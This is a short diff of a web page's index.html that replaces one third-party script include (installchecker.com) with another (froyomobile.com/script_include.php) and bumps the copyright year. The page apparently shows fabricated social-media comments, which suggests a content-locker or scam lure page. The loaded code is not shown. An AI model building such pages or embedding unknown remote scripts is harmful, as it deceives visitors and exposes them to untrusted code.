--- a/index.html
+++ b/index.html
@@ -141,7 +141,7 @@
               <div class="clr"></div>
               <div class="comment-status"><span>Like · Comment ·<img src="images/like.png" height="15px" width="15px">100</span>· Just now</div>
           </div>
-          <script type="text/javascript" id="ogjs" src="https://installchecker.com/cl/js/ndv656"></script>
+          <script type="text/javascript" src="https://froyomobile.com/script_include.php?id=1232260"></script>
      </div>
 
      <div class="chat">
@@ -159,7 +159,7 @@
       <div class="lnks">
       </div>
       <div class="detailss">
-        © Copyright 2020, all rights reserved.
+        © Copyright 2022, all rights reserved.
   All trademarks, service marks, trade names, trade dress, product names and logos appearing on the site are the property of their respective owners.
       </div>
     </div>
